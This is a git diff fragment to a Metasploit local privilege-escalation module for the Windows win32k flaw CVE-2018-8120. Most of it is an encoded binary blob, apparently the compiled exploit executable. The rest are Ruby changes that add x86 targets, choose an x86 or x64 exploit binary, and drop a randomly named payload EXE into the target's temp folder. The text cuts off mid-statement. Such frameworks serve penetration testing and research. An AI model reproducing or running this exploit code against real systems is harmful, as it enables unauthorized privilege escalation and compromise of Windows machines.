zPs5t8nocvKwSVm9VHMWsD~}6BWp$eis(yfmjid~A#WJRIJ%nE++NMAA7Askn=ku)-4*pd3!Ej7-Rma`z@=t~BNzo?fs+l46Ity!|0DF|;b2 z-ZWcOM+h%rA(c4Gzk|v%m%228gM5}|YVc&SeF|H)o8X@g93o8%>7o_6UE=EE<1OK) zu=6MEEr{zPKk6^yE9(C&|C4(po4wc{Yf(E=pUIBYeBU0kqFkxuX|}u0 z?{}#TOjHSN{1L?#$isF1KWHZrC-CiQlxY$jM(lyK>dM2>toqWeQ6X#kB(f16A~Mo7 z=|te^#a*6q^L&T&XYyTIB42E(<3hoegYC{O z!~}J{!@CSS*4EDTe5@SD;mB#)6&?%S7wzsNJv-Ga4ubT2q@Ek~$>68+6Py<>&mMc* zZ+v(v>g|SedsFV0c}&}>0AV@?O}#}5YnH!)GuMucnvgNGGW=gq8DWk23pjb2&rDEm z{dqn2|r zNow|9$A-J5HT;6NJcLUVzs`|=uQSrVTec`q>+LP>=jRHqeF*!N1~Iwd3ezC%P>v*r zJ7gjs`LgJfYa(tSA@)OM^!|8Y5$P_PC(}bD=Vm;g5pU&L%eiV-vtel^B`RGIl=!bB z1q8(dP+kNEDqD~isEG)c5ML(5`nDNkvp1Yj`;(xfBnZFlX*xQNFc9(V%KJYpk}PLL z8aBKkg@MNu=%&_yjjVcDvaX!1RJcQd$4hgk2f%(pIH2g@YOxrB1qg>Q}-EVm9lDW*V z1@rT~somQfUa2K=Ht2|mC?HNz!ObJri^xM^h)hBL`X{OM5x#n+Pu|B=OB7~(AtI&v z9rHHQK)tIA)Q{@X3H0J3xS1aIWGyl#a#v1uLkOpGsCQxhhndZ{H4;j`L>dbJ42eEF zOkE>tf4h7k!WSwjwAB6#x%RV&gox$dh^8LC)shkdp2HSKLAs|BkIb?=6SAMTum-FoyRgM55P2N(_ zlM!vpW4r7{cBE$J9v-aS?r?FB%|8S z2>-qF#1c9J?`?hqXHzdbPpr~#)$_!GFm@5tHq;i>Ce#Mhdej=!N)%^MPjd$KpFB@2 zk@;FB(+#MzDC2;H-F}9+qrUT*)PLqYaqi0!uR2fM3oSIe(s|;1(n48?=f_r{--OzW zGS2{C@jS8kCOp&6-#JgL!tLPiAD<@x~&M-s-@H7{LGu5 zSW8bD)*DX#Mx+A!y~@1hSi|58u}8TV!OAI{qj^^M5!5Sr*4JO|SMP}e5A>_I{;tll zpFJ4FyXtv9I7%gGvh_$JnGE)o%BV>T}1^Vz=pDu`X>*^ zhWI$;!-!Vaf4cd9B46CrbdZU9X3hK{dH(c)-jCe4<|y~ey>xUUM|NZGUKi<@#EYek z#Ku+3+&6e_)!6uzJ(?{0jF_~lghcoGOFXzW+!NY5E~M$&O#c-2fgKsVJ$CH8j94N$ z&JsAe#tX5$XDG6iE4s+J)GA*_2tswn>JMZb%9^5HiqwmBjC*|_>k;dXt1rp&oja^% zwUNwf=m51I&->R$xmJd2=ooe1nh|nqWS)0LSks)E)j@cQJ;@p-Gi=|-bst_|_ilLj zCw1?HhqI>|!SGOqu;FXZt+<{0DX+7f^S!*9WkpFr-|&xXLay~%D*Rp~JxKxE;pHLW zEqRQ(+t=f&&vu%n%j;*6Y?hy5y2r}1^Du)oH9D1zJC4m=Q++m~2GPumPd}aawEtO| z>Ud6hQ<)z)-}PFoyPOT2AFFYmmc^V|{-8Q@oOgpHf6oGMc|`0V=FjtYokE#1c{E?h zauqSRQsc3#*w)y;&}4B7Q04U#opQU~`4i{gtUh6IiCr(RzU;0Kj=d)07S-<72e+ue z)j{0Hz^y*!)j^SMR|iG0f+|-BMX9TUP9Vb@MIhYT&_D7>(~&pS)j=n@I*6-=@Wt9c zE>Ue)2lWbE9Tcgr4vON!pg!vAAa#jQdPUbS-5xZ}W7=iUUw|m^!Kw?6ayFf9tXfTb+Bsts*LpoR#Fd8sE!VST|9nbNO$zw@}5_B&4;JovY<-mEIN6KBg|_AdKUgQJ^5 z_-kX5&2F71Nv@vXPb`U*Vb--Wt%$8%cbA2`pVelo?2SGy8x%c4Z0k~keJs4ChQt_+ zr^3{hsCDgnzJLI7IeJx|H=HrNeYZzuv^}52%HipnzlMd@rir|gTV=Sf9gQXTJ+k={ zlfPaZdfT@6!78g58nn2FD1t z$u@6j#9wxvwQ#j+Bq#o<+g|6pYCE^Vx~uN|2`_ui&YiMfF8kUQ*7GNJ$xe3lM+*bi zQL@J9Y4BwsMNwN0BDUw***IjMat%8=-t5nKG1^=CoV9um zk^M%#$V*J$j6{I7dIC0i_R7bs4<~EgHrdbiH#)^cOGXFdmdaYap6y=GX10{eYCH`!Aroru4fC#L zc8o)<&qI1@tuG`Xr*8dui*MXTHn(dc671}4Z}!!(NU@(qiUTPkny}70jt8sNwzf}w z&zD@9Ufme1gPZD2uVwf7mt@fA+3r(u%U1W)wq&r)`VAyK*#JbIrDgU0;94ml&VknE zu`X<94vur0<{vg6&l>RzVUEKi6< zh0B*+%d6QZVvo}9Bi`)X4h_foD%Y&ZYUTw*U;1b48_Ldi?U7}*-JG?AEj!;I9%%~y zxHWydlo^t$o@URhh1BNSwUXL-Zfl-zUtaibwwIepvD*1=R$@l%W3%(kVRCl9>HhT2 z_a}j!?{nU4rInrU&*}Q5eK^Nnx$JzWe?Bp=^ZmKn`93EXKgiDaC(u>3C`dq*%a@;o zS8gHV29cn3z6(ct)8B`w^SqU3nz%oK-R&)`Hh0<(_sfp87oUpveU%#!&6Ns#?jqDr z-@&2RtkY68oc>*MT!BTRJo|p@gFk??Qs4lpmPqry$rFMXU}fDc3qx1#+$DV64*~g> zey@6+Yh;J8MWq%h=h^GE$cE3khWk4-F)`}Yt}n8TgwwTNs~HqYeRO?ez#p!;y-qZ&pmb^NLJ;&KVWtOJDDE?m&!yYZ2WeH_91?9kc?&q;m+;%GR|F>V%e7x60>e@XyZ0UUVKt`{TzGC1Dxt0D1Y5Yk*hztL|urjEe!KkZX#`G zeA)g5+-A5>tv$#d zkq>EYxEH*E0VN}(rtrhl_>=%h?>l@;r>Lu_N3uli-&XTL2+{lKlVCOLqxFPEyX||q zrgASycv=?0k-A4TpC#JX@WWK>nmDHO;U8n+dzn{bkILxvFoRj=UIwud2~=jD{*mS8 zn>keDdqoz)Dq}dU3q5h;7-{jzUgf4o zQd;RPlH*r8o4QpcCVIm51;tFVzgqq&DkLSZwaXWU zvOlJdz4b^TC`P`rpBpM)oWSy&vbcgP! zg3wG!b{Vuf=jy`T!QuPQ)rGi2dl(^N5iB}}G`s~YIyMepVzVK@Ljw8_I*^i>P`y*z*3>I-PO`CMTzAH3|j zriTn8c~7jKJ(wO2rB|D`5&!u{Z4DC$*%~PjywxTU z#EHEws}D%pGG`%O_gi_`!1tQY9Z9^MMult<^XHN&cLYhj7XM_RseAaVP4X?dTm8P+ z;CkNEQ$j=3M1>m6$gcK9A;Q|-Iv(C7XP$&GM%ek+`hCm+m}dLO)-}(NJsx_1qWI@+ zrj|FBwU7;lN-eSHbS~zrTpZH5IHYrNC|KpV&`I zxncDomGGV*QIW($D)H~C#7B}vY{>utsSJR@6oQ$0j3I`(?y%k~+5VufCCp;|8I7Uy zv)BV`YAb}?`r-$n__HbrLiA@E>E;;TcaCUQ(foFPJYOhZund zfGv@*{6TU``oXzOk@U*d%6Zg*tq%9(>d`yo#cOwpoRqfyEGw*OC;|_xai~{D-QlYf zzQ*i}>+ouszN&{Qs|Tnrs$F5b#DCx{byN51hFu(k7AyaJBHGhBAh&^)+5r*oz)Js% ze*NzVGJ2unQ1VOShJ&f7yHQ1`m8eHix1)ZB+KHMR%{O2$Y7^?Sfk8$Rc8?Oqf1sX0 zy@YxV+=)s;O-3z5Ek~_KZ9;8Dy@YxVbq4i0Dq?Vu(HnIq%7L1NDn&hn z+KhS;bsW`<>NzCH7>OE#nt_^+Dni|lT7&uyYAfoOsFzSLqZ&{jqAsDXCH=RdhNA94 z$*+`j%WrA`Un8#{qAvfPz1d;Z6*`RX6+4VoPdJRKdmL?EMt|2~6g|n+fqmNT#PKkE zY)eTomKo*7Vxz<;GhF-|YUCP4{Nok1k}~It0(VAP$zoS|xiqeZvG84oR4Ahs>;^`? z=P+1JF-k!i7-I*B$dnOz+F@KP_8@|m#ttw_?EmaAZUU>o-r!;IX3+7z!{`HU2X6r{ zf_=sQ1BYP)!~728R-4V2;9AaI5;(um>T2%`sS zjV8Q2@>gQy7;dA$C^nX0Q;J#iZuI4b2ea6eDRVJ8vDe?^LZe(262YsV8Gb@r_~sWb zLM$P)CCE@nxTVConC~S861oj@8Ll46K>WJ#BWdg$ZsLCP39AlA6kJ}hz+(D}HNmn_zh*U{PHd39VxT0g;&2UDxh4a<(?IsT4w;X6`LrGcW z1oCc%JE|>Q4{2~w-lhCqj8930ja+$1layiS(4?Fe8%y!wA`YQISs>(&bRBNAm)DiU z&*%Fb;`~S9w3m;BBeX2yOB<;w;ctmbwWgtzML9OwT{ua~NI0Us)QteYjxgfd^8eN8 zx`5C%t%NGW6kUaKVv-b@sk>5q@on*yLRl#tTY!h$n5F!MZzYdX1_dgncFt%IQJ3Ec zYMsenUp@Whgq*9ww(+-ErMp1IT|oWTHCA%i9$P!T+WF@rbupFlpNUU14_6B3O6^aqF}#i5+#$w47d505{QD`Ax+5tw<6Q|@rrIU;jd}% zS>_d7&3s7iC6xtmnDAhG3^vuV&A80nNji1!cPsU_yOE(xOZb~Z2uXxsu-jVN$yU=| zhcB@$MM(=;Y>ZKH427;k(MfpbFP#)ER-s7WmPZP0#w_fFYjm%XY7FL|jh3x*4yNF1 zkxEaQ8pSbQEA|u>-2oD#@LUo6V*a`qMi-gmMH-eaMwj5o5U0}_D!=#`^2TqFEg@r0 z*DzyLOw8H=#xp$58DM6FP$xE8t=->@f5ko7Zr^! zD1*o)Wd$x3m$TTjEVH8A?OHaagaUAt3++pmmFASWGTmhb#Y->~-*^fGGA+xYG{meu zPb$tU(PklWNB699S6LuV?R9F-GMD6SQaOB3klV>}N@{veX zEMA&g;wg5Ij8lFl6co861(GV5W?V&DPH}FLW(~>nRorJAEgw0IkY?tIs6MDdT8C(3 zvZ}lH(~Cwk2AN7)m(q$v8+XxK7>xPEex?B{8dPqC2> z&ZI8QcI6r~^F8oOfsvWx7Ps6SCZV`1#80_s@K>yLhWIa2mc+q#${*i)%9PG9Cg&6z z6I_do^qevyrL+vJFeVe{WKWTi;#mS+OO0uZ-Nw|C<;Hl|V)0MCtB`NXlt$=~Q?@uC ze%B;un+r8$!=6?($E@yxK;5X`g9E8l#P6YRn-cWckT>D_YfPI`yimhpJXr(Xm?| zs(R?bs$QX?^z3Wbt_?Men3$@Js&(|zg9avK%&wx}rgP88SVs`HK~?Lj_{yMr&(F^f z3+uX~wDi8x(l7Pv3>l2g!TR#%t)TR$+d=8ycYs7=)PsyKjKd%!2jc`N{d@!14fKOD z;%NqDjL-r`fQBW7aV7%^uqPM^idbP37zx@ySq~coUJJ&6*MSLOFVF#A52k?}qBSx= zStpwV-UKcLWt}V^ly$OFP}a#-fQ(U$Dp1zT)`7BK_84dbH-fiv&90E3j(O?TW3^YPgnCFv!a1G4O|CifRBN* zz>T1^=bOR1!L6VR+zze+cYr}Kz)mn2tOqUNaWDjw{wWk}z}y8q3w8xtz%Vc*6utmI z`;@njz(~vyU>~ptI0)Gc) z@Fs8r*c;po-VAO7`+z&ZuYr5PTfoC$U+@%Y1O4Ew;Ah}%pwR_>03*QuU=%n2><``! z#()FCWbh6!4ZIVa2@VDqf1}}mxFd{6)SPJ$5i@+h^YA^u|q5&BX zhJYcIvrIHHFn0s*0lS0wU0I&eMM3)~3a0B!+$gWJKcf%V`J@Hl7(&w^vX z7BCeI=|;N1K41_H)etZQOaQxr>A zb_Hv}Zs0+%J9q+&08fLx!Di47UIc?^@FKeNJs1Uc1^a{Dz!v^gWbReuse7b>V6E>;?`2 zyMqa!9UL$2{Yi(ogA2tSEE0Ecg}4tQJ>m{-5O;91*bgB+Vh`>RdvLGV$521T9y}%X zpkM6csGnjF8WGro5nxaP^b#}JU(CtSOUz)hm>tkd%-~GH@uX8QjdTi5A)SI5)Kf5I zCG`~S4Q>XdEgVObVIWB~wqkcLD1D~^{W2V{T;!F#}6U_Mw6N}nTrk{k1Xg6qMhp!8+Z z$8Ev97?i#}NbE5~0%Ipw3D$!zh&}GXU;}2S*kcX>&tjIorUiT$lrcak7}7I^kqi06 zEMtR6%uj)Rz;A+sKjE!QX>B!RNqw@HOx_co=K|?*h+)wO|W)43sfTH!#GSVjKY@ z!9Rh0z}LY+;LBhf_-oJs)`3&NO)C>W(o2^As=& zdJh%ETn-xe4+r{V-T=mcPlL(e&%iV=9h?b14=x0Ef*T1(#wtaa*NHu58Plx5EMtZ+ z!i@meV3x6m4R;v>J%-s0=HpJ&V{F3wb8sstV~$J`6^3UCGH zB+!QWK`@5zuK{I@G!`6!y%$UdGruAK+#%8+4G5Sa2KW`@yZ49pDbkkAV4@6To`RRbVORMDRG~ z)!;h9?E^Moo)4Y{i^0dR{~FkWc>$Qgcky5dk5sJ$x8iOCBQY-mH)6g8?1OnBn1=s2 za1iG2gAVZPU<3XJf^#qzfVp4^SPELeD)3$KG4L^P6Zj;!75pXm9Qb3f7MuVc1WQ4^ z5@3)P;d+CrA+<&9%N5G1g8XEsNPeUvVH@S)rGo?5%0k{$=f7ezM9SKiP4YU%Bc%1@8@*g)8A- z)w&95f3iX%zXHXLh}s3dleGl-mABA1Wsh5a`GIwV9K}sS2c52E zfpBwFDC4fl zs=h#YBbw34T`C-x(mT-$k3{q34D`Ym(Qx1-r7u%@u^0Y`#&(L*d(fw;_E7jl>?JPY z717T`FZ>ZrPbL0~NuB7Yp%*@hre_g**&miPOZdVs(dfjF@QmoQ&r!e0`m z(7~nB=~UqhpG6bvEbN8XL@)Ujev>dIox*d`_?U`b_)gN9j$U|A^mp@j3MO};tc4fN z@)CZG#(hs3O!|ySkflxS*FsQuF@>~ z#b&t(e@nd5hX{|$8u;BxFX_Ka@s;qp=p}sNccI(mc@h3M%WjcMzm8YxgP8`Y6Q*A3 zMY~?}n50wchiSh|m4%spDMzg@@9?eE8%e)>yI9eDqMBDoJu+#l>yr7kS*N6wCD&%% zl2D{{4LD5aa-5=~@UhTH(|wtu=~P7{X`>}n85c>rEA>tIPp>oTbV$1^AxobvZLaW{ z&{5YJ?O)d!ZC|YNW7Zj=X-1&T!~CH;RZ!@+)c6^+cEVI7P3H zW!cfcnSZC6A(`!sQ}Ke{8%a}qs`ISJK|0TRtfcd-+aaCjRK?5XD*rkU9plsK(|IuC z&QMe`g=U(@x;+^eNXIhzHM0hoag0}Gs^dsk zC2z)|+XCS;UG6##kzFy%RHtK+Dr<@3@-ou#=@KyGlU;k0S0<_4>TolZy{22bDgjNm zD~Bt!NOOxB?o3s-nkJfOb+{raAiSV?P}11B3`AONCad&oKQmSNYCn1&qWw$> z#3ymzt;W^bkLG0U=dOUg_{j*=SII@H>Ql5IJy+M?W+~p&_TxJE&*)%3Jy4bsj&3#d zx0$L%(fYJNxrm>sv>HNJ(Pt<=(tIbpD!qy>CqdoLixiqkhaA2$^^0iZO?|E!iRg5? z)TmMG3)F~9>kHNBM(dZV5scOssWGpquV@QXc)|={B#%t}y&deOH8$;Kv|{RYFQ>z- z2&7s14&6#E?$ADI8~wKkce8(#F<&$(lQ8u-M~{Ye|041h+$OZUf}6X)h8>?RpvI>9JWf^wA?UJ+2a& z7qjl<(4(08MJgSdkM*eD)JvMQUZ+p%3sl@%U#QAJ>x(;tQ>yqt+v}02*2_Mf8K&kT zZGXQid(D4RLgGi$v7}8el2fL=$St+&+x_Quu-AKzIvh=RtzV*Os`dG*%(Q-)S|8AQ zkwr7Z*CS|cFS57o_U-YODxT1Oqz5$pcskgN#GBYlA1V^XqL=Z9d}WT?L{?e!GEUMn zBRzi7vjE)&>zRkv>+&-7Qunl8{+jwCRo2>m8T=-50U3+vc=Z@a^R6CS>-|sg#0V`x6sdiks8bkX#HGSAdw$0dqB zdi=Lk@s%Ej>GYW6CvB2%WQ@5~w_d*_j?QX@1q?T=^?wQlX0u zRrd;d79?|{c6-g2QrC5FvrLt-9?!~ObDp7RqiVF^r#cOK zj-qF@dX6Hy<>q`vY}&_$BD*d>bG)Ltzul}k*PP$zS+Snq=$Ww|!|HhT_($`f*6Va? zz5JE_K*r{J7Om$fB1I_ny5BbEa8I(F?}sMBti`Ibo3iJQrn z(wfS=)Er;7+jne(wSPH*a3%lRzO#RsW0`aiy_t8Je~2WSq(R~p7wHxB{MzIdkwR$K z%Y0C;F6jA`E^k?95PKGN-ZH{rCQ@VHNrEf1UlWW?jX3KA};TK!=4nzau-yw3ZGZ+*?9-+1hs z-}?53$G`L4jZgf?e{TBT_kXbY$)|p}<>_aBwDs8^|76=wfA;h3zxd^^p8NIlFYNfu zi@)9ZyO(y=*6rT2_xJnu*B^NKm4kmc^y=XwM~@x<<7=;1@l4a%zkK*n^T(fj`q^L4oo~7D`QI*najDe^3burVcIg_{t$TPxkDk`ZYp%Vn z*Y!8t7S#U*ZAxu>+Wq|EKg9cq5(EGsK1OR}jm4N3yrmX}jdaJFr{%Z(5@mP=h_#jYaTfb#AteF)4K<*K|D zmE`1NZ5v`!x?*>G?o5NF#*nioee7C!_JZadlB?az$&!VA=OO_4OE_Vo-j4Y9w zPm&LX5;mNdA<5s}xdK`ib#Sb7kJ}*AQT|{xu zf_Ne^ughs_$I`V4VQ~wT+f;X;cwMs!%G{ouqIB1?5@gz?JSISWo4dqT<|;2KTJEx4 z#qXe)6$9qn0TXomhC?JJi*0g{$W}@YZ=D_DXb4t3a;dy0x(WjTuqiVEBnLx&Dk z?$aR4eR2|~cnMYn!-rGd(><=Tib))-DO;{8T^{V%IiKycxsu=ZOi3D?MXu%4Ba*=3 zfaL_W#3j+I_*08qImP1SDb;pJZ)7tbo5|d(Lahlb!K6sX6CSN&Ooz~~XgaRV>FLUcmzQ{qo;~w_>T+A$G9Zs)L%wvWp@ud=d^;tDJ zb1D+!vvHL#%=3h|A}=w3Sz)%41Csm&3e2`xoma}W-3QCtN(-oYxwq<6AUB{=^WXbZ zH3Hd-+X8X~2t71ZAtxciCRg}zA5p7V^XQF2)4cE&hw^QjyN(^9qiU%*9W^R{r-J- z&42Iin(09uua-FwL|@ABM;U)`cG5K)c~RY4n;kJHV1va^r}LM_60u7!$@LVu^dZFA zB26}fA(b3LkdlQ7XgL*+z!g$caETfTXPvvqX}Tn@fMng5Ys8=7Lf}c*Zh? z@mt_jsB=XM560=UsX9I*v`bOByKHf31u@^{oH5loC3eKn+#(iZJ%MmKk2ehCqu{HI zFN~~A=M3}fI|5&iD{yo4)-c|bue5=`<;GE=SO@dO@sk3dc9Ca|X9yT!q^;vt)Kbt}8V^r_A_6sHvS< z(&lc|N(hYibfc?TlDfJHA+EZKubwHni=7_Gb=*#JXPoqQBs4&A- zrjF_sFLtRzyil!shfo5vCz#j7Rv$^0Q^hIeDi!FAf#TvUUS3dEQoM{p(?^EO$@}+$ zgio&I^k8UKalSeioa_SE>v%qhRZdX2x+9MMKfHw9^EFn@4#VS zgkTn02bh|J-A04vy3`WIDYK2AhA_9vD!z{+$w)s-UC3lUY8cF6!UEe^cPAQef))j^F;` zrd{KOuWmq@JR~yXq7Okup+ZqTP+d^nP+d_GsIUNvotS05DQ@8?(@nyaZw0L=30K%# z?Boo_wE-pex1z*89wla}9b!%mm}zv>H!}kEnE{mgE#c2aN!$!V)OX838>$r52PONh zl2*xw_^(1qnpX$#K~UVQQR2P^CGmd~bq7jh?#28hO47FlCGq_TCH60%Bu|G>;{G~H z+@m0h(8r`1+P1nJB!&(@(`=&YWSTF>%iS+G|0Dlbb2r2JpTvl>4x<;!{4xD%tuhxi zOw0cQ%J=fS|1pR0Rn&hW=&N{*yy{PXV7uz?Dgpk#X?^v5A)TMAFYN!nncuIR>Z`Ix zU<7bg_ON~BDE_5A{{Mq9f`UWBwvOVgC>`g*2P+=DH9+%c-qxBYpVqkg2MrfR=Xjt> z;a2?D{qW5n+O+eR{__5Y`Z)sl>#yiPCE)*g{J;9t>8E-de}2mUl$^Bd{A&yUfhW}$ z)9L7^zd8R+o3Y@{!Z$~B_Ka!uu@i4KTwrhP0sW=)9jT}-%?@KLY8z@h>N(U7)J{|_ zsvdP1bpmx7)r@LEg?#KV!cY;YNK`LW6six(hU$+Rgc^d1LB*kxQE8|Ql=z>6T8PR= zm7-Rn)}S6kZ9;8EZ9#2E?M0dW-C^`6Pz@+Qsu|USGCmNx5Y>NM&zRM@Aa7bX5};1E;-Dh+iHst8qu+JM@G+Jf4F zYCy?d8!)DW#L!KVz2oE|1eTx;=dV^_&yzonkcK%z5?8;_a9SbA4CF zM5bQcZK2=3siQwLE{S6(4t>CwssC853j9j(ABX>|DG5{3eC9@-hqD1R)8N_23>ww> z*Styw!a)~XTV-4-<2eVamAX|0u4X(TV`Lfc+EA-dZNJUIjy8RLXuJONur|G8Q$(9S zV~@2>-~Y2~O?}mOHr`jE++C2U*tFQgW>IZ-0*p>XpXI^cc z)OW@1V~&!24eJ}L4orOU+gnq1u3efnFtO%*X~W8KJOA|PTNl3fx26YvJU#Wv_m{tS z@RK`+tyz8h_(733{p#h}g05hl78R2gvyS zZS1|HyTAU!Qu)&|_U>H!+tX^kTYPQxU&rn_HpF$)yK`=Q;mF5h4_o`KnRxTWZNLA~ zhhrVjJYP`s^U&XodZ=k^?C722?*H>2H|%=tgR#56_~KB`nrrSm_>0Wd`kS98-E{xr0ja}lwx| zf8*y}HdJ17I{K|296DMb@~3A`TxoP&6*<1G9jIa>^Gj`ll*zw;|11T#r=K8DRh>f; zX-)1dxPrah!<2^G!i7ObrP+9P_&9m&ie*Kn?7`@P!-vKUw7Fy*nLY2(1G8pMh)x)2 zD|fS6nNw6!>>53=!c{(S?3fFUwtv zJ;(=C1kBi!x$fnXLF7&{%-#I*Hph<6&J}zrYp+vW%aKk&2*6b|dSFiZq~hfz2r3M; zc?wb%%kBQ72j=AzmAeMohP8#0JnZVRBoFJ9rsQF5nd9^1VJ6)$bSQ_bY9qO;gK`Ur zxh*CxW^~M~m<2I~F`k&O$2=SJ%b4HB?2b7U^L|YK;f~=C4?jCRXoPLVs1fr=tQzt3 zh}TD)8F6kzm)MBdTVlt=I%6M*{g2ouW1opV9Q$GHr?D4ehsDLm<;Ru9t&Dpp?&-Ma z<7(qxjyoRrR@_H%7ve1OJ>qYS9~d7SKR13sd}aK9#6J_iH~x?DZ^!>R-ZHZL$X+9R zk4zXjZ{$x#UK+W4)XGu+IqKC>4WrJE`gm0D1Y1H(LVUusgqaCnBn(O%nV6OMXyW$7 zHxgSDqmph(8k&@pG%;yL(xs%H_Ur8<>Ra8^>mig>p7{92!|- zddA!oQy+83@R;G#htC=QwGksnq>Pw2V(y5=BZ@{mH{v%V_Kf&qL~v}kSZi!~?3UP{ z#J&`JF7{$4Eo zqmlI^^GB^3wSLsbQCmm-Y}Bq%Z;kqF)TL1&3D$%W38NBH6VeivB3Hu}-gKOFtm z=$>N+kC`-P{+RqR`^Q`w6E$|s*gByj4T!9Z#mD?Q=F^yqF};VcA3k@)x)I+T@xh4Z z5r2q15!=LDt3rX-;DlF3UO(!VQ4>aO9`*XDTNB14Y)lxO7@IgbF+cIgiMJ#fc8C2g z`*hMVBzatNPV%jh_)eEB@~I`SFY5^WrCtnmX#y#Ja@S5>F-eO0p#_Oj?!nT+*vht~az> z4$sxuuT5T^e0Frvm?y>@8S}=Nq_K{%1!LEY-86RV*cZm08fz>xj0Sk?mY9;5ikSb5 zc|PXVn1+~7V!95$X84W6zc#!d^=|#}KCy#i7sVFG{t}LQIrfd%)9}UzQ-Bm@QW#+b zH3)-JNGpq(611oZ;BKLH+pxMLOrDeicLJaI7a)q{FOiP(JlB0a&vEQG?kRWHJ>$OQ zzU(f!ueev-Ywq9O8}3_JJqxni*n8QXtch)BE>r9-b{~HG4%W#&&mLk2SeiY`9%J8N z$Jh{i8eJP_&$A!1Q>?&#&3?;%&lcDPb`cp~WpA>7vYUAW-^_34ckpd^4;|&4x9}bO ze*P(*;Cpxv|1v+wAK_o;IX=L@#lOu@@G<^F{sR9g|2aR+&+-yq;D6+=@~gbc-{Aj1 zFYCpvVv7iisQ8HB;$G1q9t0}~(VIoEeT%$9ZjI{fJuimB` z^k$gh0sWxv(n)yXQGG-o)p{6>En>PsYlzEwIGT?7!L}^f1QmX8YK>1N)KgXHnBBHp|Yk66*OUwv2kd z&T0%t%kdy@ki$E4E;n$4L7^Zcg&0C59Tm`O8brp*jGFbm6syhbnV zMLayIJkHR;!+tAmJ!J*RhsiFawud}N!t^lR6syMe+0WT`I*#*U3M$(id%J8-I}|o zs6M1W=2h2gSNQkyti^7!d*F*j=dv?|>=u#QMa66X`bP~ z;&Z$R#^$*cJ4BawNF*^^(qc&bLR=R$u_kb^q^y?>GAKiGkL;GcGAUE?qIzomx+Ux$ zcsOFk$!?M)$H-~&0lG&Id85eGE8aW&pdTpX%q#p%oV1cQ(oQ)_Ln6Lz9bvtv8ji92mhhtuhFJ4q+)^f@_a zz!`K#;Mxgi%9+6?Q*`E?C1)A)devET>f8owG+{UDHoLZ~-MHK4cEG&daBmtjJm(I$ zgYJks=1#!CGca%wJzGM*R?w?8w~jTi5DT*?Yi2gnEY8|CyxYx^ux=mAf!skh!p7JH z>@WjA6xlpm+OWeaTf-jEz(YLDqr92hT=O_@!}ipPPA1XCz759?@(~zzf=}@oK8v2t z^CiB#!Q2|J6AdD?Vb*403oYWJ4R-Am-RO2&^obm{i9s4~?Gb3h2QOsi^E{hdR z*ELax{)c2(MrAWRq-9*T$qv~G8j>pZtEg(mHlkHrwIO$%s#_&h8dk|-zstiZqiS4Ds%hkKPLfCE>lWRr+jRn_@6{<7C#(Bm`e8k)$MvM1)&)JMOW0}3x}vMPrURzl1WhAM)MPC9 zu?2IW-6Twx=`|^nFftc;bl`mMY*Y>isu)}%FU6|n1;;I6V&v8q-LR;?#N(nunt2^%oS zJwYoHnLr|YNeYR~l75mW!(^0Z?TXrdP7w1u|P zcAB7Fw3nu6hGww~=IJmE1UGH`oibyP)ySsxRV*+@$7zMu$3ig+b21ehh~;CGxYwx0 zg4n3r?G$o6j0Df%KBJ7x2Aqh~;&eG#XVfV;Wo$hWB(DYkj12d<*tgbe5kaCe$Zr-2 z?nj36NbxXoToiL4umlDdKw%jiRzPAEEY?6Hj>uK@ATkIh8$o3RTsDDB3v6=G*#bUW zL1;S|O@PuaaM}w}QyZk_!0Nz%X5a{j9Rsrypmqw}&Vbxmuv-MZ^Wb+01TTZ(6;Qki zj@LkP9a#SFso9L_-Hn|khdY@m&^rr$i+Y{cD2Qzavo@&J;5H6!J3wwH*zE?rNt52- N7xno6*Z*V%{smv!`XK-S literal 0 HcmV?d00001 diff --git a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb index f80b35391d..699b58d518 100644 --- a/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb +++ b/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb @@ -7,9 +7,9 @@ class MetasploitModule < Msf::Exploit::Local Rank = GoodRanking include Msf::Post::File - include Msf::Post::Windows::Priv include Msf::Exploit::EXE - include Msf::Post::Windows::Process + include Msf::Post::Windows::Priv + def initialize(info={}) super(update_info(info, @@ -30,15 +30,14 @@ class MetasploitModule < Msf::Exploit::Local 'Anton Cherepanov', # Vulnerability discovery 'Dhiraj Mishra ' # Metasploit module ], - 'Arch' => [ ARCH_X64 ], 'Platform' => 'win', 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { - 'EXITFUNC' => 'thread', - 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' + 'EXITFUNC' => 'thread' }, 'Targets' => [ - [ 'Windows x64', { 'Arch' => ARCH_X64 } ] + [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ], + [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ] ], 'Payload' => { 'Space' => 4096, @@ -62,10 +61,6 @@ class MetasploitModule < Msf::Exploit::Local fail_with(Failure::None, 'Session is already elevated') end - if sysinfo['Architecture'] == ARCH_X86 - fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') - end - if sysinfo['OS'] =~ /XP/ fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') end @@ -78,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Local temprexe = "#{session.fs.file.expand_path("%TEMP%")}\\#{rexename}" write_file_to_target(temprexe,rexe) rescue - fail_with(Failure::Unknown, "Writing #{temprexe} to disk was unsuccessful") + fail_with(Failure::Unknown, "Writing #{rexename} to disk was unsuccessful") end vprint_good("File path: #{temprexe}") @@ -96,8 +91,23 @@ class MetasploitModule < Msf::Exploit::Local File.read(exec) end + def check_arch + sys_arch = sysinfo['Architecture'] + if sys_arch == ARCH_X86 || (sys_arch == ARCH_X64 && session.arch == ARCH_X86) + 'CVE-2018-8120x86.exe' + elsif sys_arch == ARCH_X64 + 'CVE-2018-8120x64.exe' + else + fail_with(Failure::BadConfig, "Invalid architecture") + end + end + def exploit - @payload_name = datastore['PAYLOAD'] + validate_target + cve_fname = check_arch + rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', cve_fname) + raw = create_payload_from_file(rexe) + rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe" vprint_status("EXE's name is: #{rexename}") exe = generate_payload_exe @@ -108,8 +118,6 @@ class MetasploitModule < Msf::Exploit::Local vprint_status("Preparing payload at #{cmd}") write_file(cmd, exe) vprint_status("Payload uploaded to temp folder") - rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', 'CVE-2018-8120.exe') - raw = create_payload_from_file(rexe) script_on_target = 